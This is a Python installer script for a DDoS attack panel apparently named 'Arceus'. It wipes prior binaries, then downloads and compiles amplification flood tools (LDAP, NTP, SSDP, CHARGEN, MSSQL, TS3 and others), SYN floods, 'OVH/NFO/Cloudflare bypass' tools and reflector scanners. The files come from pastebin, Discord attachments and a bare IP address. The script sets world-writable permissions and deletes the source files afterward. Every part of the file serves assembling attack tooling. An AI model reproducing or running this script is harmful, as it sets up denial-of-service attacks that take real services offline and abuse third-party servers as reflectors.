# -*- coding: utf-8 -*-
# Developed by :)
import subprocess, time

def arc(cmd):
	subprocess.call(cmd, shell=True)

scanners = "amp/scanners/"
reflection = "amp/methods/Reflection/"
bandwidth = "amp/methods/Bandwidth/"

arc("rm -rf ldap ntp ts3 ssdp tftp portmap sentinel netbios sentinel chargen mssql")
arc("rm -rf ldap.c ntp.c ts3.c ssdp.c tftp.c portmap.c sentinel.c netbios.c sentinel.c chargen.c mssql.c")
arc("rm -rf ldapscan ntpscan ts3scan ssdpscan tftpscan portmapscan sentinelscan netbiosscan sentinelscan chargenscan mssqlscan")
arc("rm -rf ldapscan.c ntpscan.c ts3scan.c ssdpscan.c tftpscan.c portmapscan.c sentinelscan.c netbiosscan.c sentinelscan.c chargenscan.c mssqlscan.c")
arc("rm -rf syn9 prowin yubina winseqid winsyn")
arc('rm -rf ovhbypass nfobypass bo4bypass CF_Bypass')
arc("rm -rf vse telnet dominate udp_abuse tcp_abuse")
arc("rm -rf vse.c telnet.c dominate.c")
arc("rm -rf csyn xsyn zsyn essyn.c issyn.c")
arc("rm -rf csyn.c xsyn.c zsyn.c")
arc('rm -rf amp/')

arc('mkdir amp; cd amp; mkdir lists; mkdir scanners; mkdir methods; cd; cd c2/amp/methods/; mkdir Reflection; mkdir Bandwidth; cd; cd c2/')
print("\033[38;5;202mDownloading IP-Header Modification Files For Arceus I")
print("\033[38;5;202mDownloading LDAP Attack Script and Compiling it!")
arc("cd "+ reflection +" && wget -q https://pastebin.com/raw/cRt6CBpb -O ldap.c && gcc -o ldap ldap.c -pthread")
print("\033[38;5;202mDownloading SSDP Attack Script and Compiling it!")
arc("cd "+ reflection +" && wget -q http://pastebin.com/raw/vpbXuKVA -O ssdp.c; gcc -o ssdp ssdp.c -pthread")
print("\033[38;5;202mDownloading NTP Attack Script and Compiling it!")
arc("cd "+ reflection +" && wget -q http://pastebin.com/raw/PJeYk4Bc -O ntp.c; gcc -o ntp ntp.c -pthread")
print("\033[38;5;202mDownloading CHARGEN Attack Script and Compiling it!")
arc("cd "+ reflection +" && wget -q http://pastebin.com/raw/Kktvq2pz -O chargen.c; gcc -o chargen chargen.c -pthread")
print("\033[38;5;202mDownloading SENTINEL Attack Script and Compiling it!")
arc("cd "+ reflection +" && wget -q http://pastebin.com/raw/jmPdAPPM -O sentinel.c; gcc -o sentinel sentinel.c -pthread")
print("\033[38;5;202mDownloading NETBIOS Attack Script and Compiling it!")
arc("cd "+ reflection +" && wget -q http://pastebin.com/raw/D0UFWXmU -O netbios.c; gcc -o netbios netbios.c -pthread")
print("\033[38;5;202mDownloading MSSQL Attack Script and Compiling it!")
arc("cd "+ reflection +" && wget -q http://pastebin.com/raw/RsYN9wYs -O mssql.c; gcc -o mssql mssql.c -pthread")
print("\033[38;5;202mDownloading TS3 Attack Script and Compiling it!")
arc("cd "+ reflection +" && wget -q http://pastebin.com/raw/LAb0nSbh -O ts3.c; gcc -o ts3 ts3.c -pthread")
print("\033[38;5;202mDownloading PORTMAP Attack Script and Compiling it!")
arc("cd "+ reflection +" && wget -q http://pastebin.com/raw/PNDMd2CF -O portmap.c; gcc -o portmap portmap.c -pthread")
print("\033[38;5;202mDownloading TFTP Attack Script and Compiling it!")
arc("cd "+ reflection +" && wget -q http://pastebin.com/raw/De6amhpb -O tftp.c; gcc -o tftp tftp.c -pthread")
time.sleep(4)
print("\033[38;5;202mDownloading PROWIN Attack Script and Setting Permissions!")
arc("cd "+ bandwidth +" && wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/yubina_collection/Files/prowin -O prowin; chmod 777 prowin")
print("\033[38;5;202mDownloading YUBINA Attack Script and Setting Permissions!")
arc("cd "+ bandwidth +" && wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/yubina_collection/Files/yubina -O yubina; chmod 777 yubina")
print("\033[38;5;202mDownloading WINSEQID Attack Script and Setting Permissions!")
arc("cd "+ bandwidth +" && wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/yubina_collection/Files/winseqid -O winseqid; chmod 777 winseqid")
print("\033[38;5;202mDownloading WISYN Attack Script and Setting Permissions!")
arc("cd "+ bandwidth +" && wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/yubina_collection/Files/winsyn -O winsyn; chmod 777 winsyn")
time.sleep(3)
print("\033[38;5;202mDownloading OVHBYPASS Attack Script and Setting Permissions!")
arc("cd "+ bandwidth +" && wget -q https://cdn.discordapp.com/attachments/564177458631409694/574420527125364757/xDoS -O ovhbypass; chmod 777 ovhbypass")
print("\033[38;5;202mDownloading NFOBYPASS Attack Script and Setting Permissions!")
arc("cd "+ bandwidth +" && wget -q https://cdn.discordapp.com/attachments/545653871427715093/574418889484664852/RAWstd -O nfobypass; chmod 777 nfobypass")
print("\033[38;5;202mDownloading CFBYPASS Attack Script and Setting Permissions!")
arc("cd "+ bandwidth +" && wget -q https://cdn.discordapp.com/attachments/564177458631409694/575879023440166932/CF_bypass.php -O CF_Bypass")
print("\033[38;5;202mDownloading BO4BYPASS Attack Script and Setting Permissions!")
arc("cd "+ bandwidth +" && wget -q https://cdn.discordapp.com/attachments/570046106474643486/575885559688462336/xts3 -O bo4bypass; chmod 777 bo4bypass")
time.sleep(2)
print("\033[38;5;202mDownloading PROWIN Attack Script and Compiling it!")
arc("cd "+ bandwidth +" && wget -q http://pastebin.com/raw/9v26VXgV -O vse.c; gcc -o vse vse.c -pthread")
print("\033[38;5;202mDownloading PROWIN Telnet Script and Compiling it!")
arc("cd "+ bandwidth +" && wget -q http://pastebin.com/raw/y6hAsCMv -O telnet.c; gcc -o telnet telnet.c -pthread")
print("\033[38;5;202mDownloading DOMINATE Attack Script and Compiling it!")
arc("cd "+ bandwidth +" && wget -q http://pastebin.com/raw/dR2pEeiq -O dominate.c; gcc -o dominate dominate.c -pthread")
print("\033[38;5;202mDownloading UDP_ABUSE Attack Script and Setting Permissions!")
arc("cd "+ bandwidth +" && wget -q http://98.143.148.177/Archive/reprobate/layer4/Other/tcp_abuse -O tcp_abuse; chmod 777 tcp_abuse")
print("\033[38;5;202mDownloading TCP_ABUSE Attack Script and Setting Permissions!")
arc("cd "+ bandwidth +" && wget -q http://98.143.148.177/Archive/reprobate/layer4/Other/udp_abuse -O udp_abuse; chmod 777 udp_abuse")
print("\033[38;5;202mDownloading ZSYN Attack Script and Compiling it!")
arc("cd "+ bandwidth +" && wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/syn_collection/zsyn.c -O zsyn.c; gcc -o zsyn zsyn.c -pthread")
print("\033[38;5;202mDownloading XSYN Attack Script and Compiling it!")
arc("cd "+ bandwidth +" && wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/syn_collection/xsyn.c -O xsyn.c; gcc -o xsyn xsyn.c -pthread")
print("\033[38;5;202mDownloading CSYN Attack Script and Compiling it!")
arc("cd "+ bandwidth +" && wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/syn_collection/csyn.c -O csyn.c; gcc -o csyn csyn.c -pthread")
print("\033[38;5;202mDownloading ESSYN Attack Script and Setting Permissions!")
arc("cd "+ bandwidth +" && wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/syn_collection/essyn.c -O essyn.c; chmod 777 essyn.c")
print("\033[38;5;202mDownloading ISSYN Attack Script and Setting Permissions!")
arc("cd "+ bandwidth +" && wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/syn_collection/issyn.c -O issyn.c; chmod 777 issyn.c")
# Scanner Downloads
print("\033[38;5;202mDownloading LDAP Scanner Script and Compiling it!")
arc("cd "+ scanners +" && wget -q https://pastebin.com/raw/Yy7MrvmU -O ldapscan.c && gcc -o ldapscan ldapscan.c -pthread")
print("\033[38;5;202mDownloading TFTP Scanner Script and Compiling it!")
arc("cd "+ scanners +" && wget -q http://pastebin.com/raw/f1TkRk0x -O tftpscan.c; gcc tftpscan.c -pthread -lpcap -o tftpscan")
print("\033[38;5;202mDownloading SSDP Scanner Script and Compiling it!")
arc("cd "+ scanners +" && wget -q http://pastebin.com/raw/7uNYKs4c -O ssdpscan.c; gcc -o ssdpscan ssdpscan.c -pthread")
print("\033[38;5;202mDownloading PORTMAP Scanner Script and Compiling it!")
arc("cd "+ scanners +" && wget -q http://pastebin.com/raw/LH6yB0Yt -O portmapscan.c; gcc -o portmapscan portmapscan.c -pthread")
print("\033[38;5;202mDownloading TS3 Scanner Script and Compiling it!")
arc("cd "+ scanners +" && wget -q http://pastebin.com/raw/bgraxVGt -O ts3scan.c; gcc -o ts3scan ts3scan.c -pthread")
print("\033[38;5;202mDownloading MSSQL Scanner Script and Compiling it!")
arc("cd "+ scanners +" && wget -q http://pastebin.com/raw/3MT59SGE -O mssqlscan.c; gcc -o mssqlscan mssqlscan.c -pthread")
print("\033[38;5;202mDownloading NETBIOS Scanner Script and Compiling it!")
arc("cd "+ scanners +" && wget -q http://pastebin.com/raw/V6jTyjbi -O netbiosscan.c; gcc -o netbiosscan netbiosscan.c -pthread")
print("\033[38;5;202mDownloading SENTINEL Scanner Script and Compiling it!")
arc("cd "+ scanners +" && wget -q http://pastebin.com/raw/gX0waM82 -O sentinelscan.c; gcc -o sentinelscan sentinelscan.c -pthread")
print("\033[38;5;202mDownloading NTP Scanner Script and Compiling it!")
arc("cd "+ scanners +" && wget -q http://pastebin.com/raw/XWFfm5hh -O ntpscan.c; gcc -o ntpscan ntpscan.c -pthread")
print("\033[38;5;202mDownloading CHARGEN Scanner Script and Compiling it!")
arc("cd "+ scanners +" && wget -q http://pastebin.com/raw/FpeqRp6K -O chargenscan.c; gcc -o chargenscan chargenscan.c -pthread")
print("Finished!")
time.sleep(2)
print("\033[38;5;202mRemoving All Raw .C Files For Arceus I IPHM Methods")
arc("cd "+ reflection +" && rm -rf ldap.c ntp.c ts3.c ssdp.c tftp.c portmap.c sentinel.c netbios.c sentinel.c chargen.c mssql.c")
arc("cd "+ bandwidth +" && rm -rf vse.c telnet.c dominate.c")
arc("cd "+ bandwidth +" && rm -rf csyn.c xsyn.c zsyn.c")
arc("cd "+ scanners +" && rm -rf ldapscan.c ntpscan.c ts3scan.c ssdpscan.c tftpscan.c portmapscan.c sentinelscan.c netbiosscan.c sentinelscan.c chargenscan.c mssqlscan.c")
print("Finished!")
time.sleep(5)
arc('clear')
